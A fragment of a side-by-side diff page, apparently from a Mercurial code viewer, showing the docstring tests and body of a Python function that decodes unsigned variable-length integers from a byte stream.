4007 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
4007 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
4008 65536
4008 65536
4009 >>> uvarintdecodestream(BytesIO(b'\\x80'))
4009 >>> uvarintdecodestream(BytesIO(b'\\x80'))
4010 Traceback (most recent call last):
4010 Traceback (most recent call last):
4011 ...
4011 ...
4012 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4012 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4013 """
4013 """
4014 result = 0
4014 result = 0
4015 shift = 0
4015 shift = 0
4016 while True:
4016 while True:
4017 byte = ord(readexactly(fh, 1))
4017 byte = ord(readexactly(fh, 1))
4018 result |= ((byte & 0x7f) << shift)
4018 result |= ((byte & 0x7f) << shift)
4019 if not (byte & 0x80):
4019 if not (byte & 0x80):
4020 return result
4020 return result
4021 shift += 7
4021 shift += 7
General Comments 0
You need to be logged in to leave comments. Login now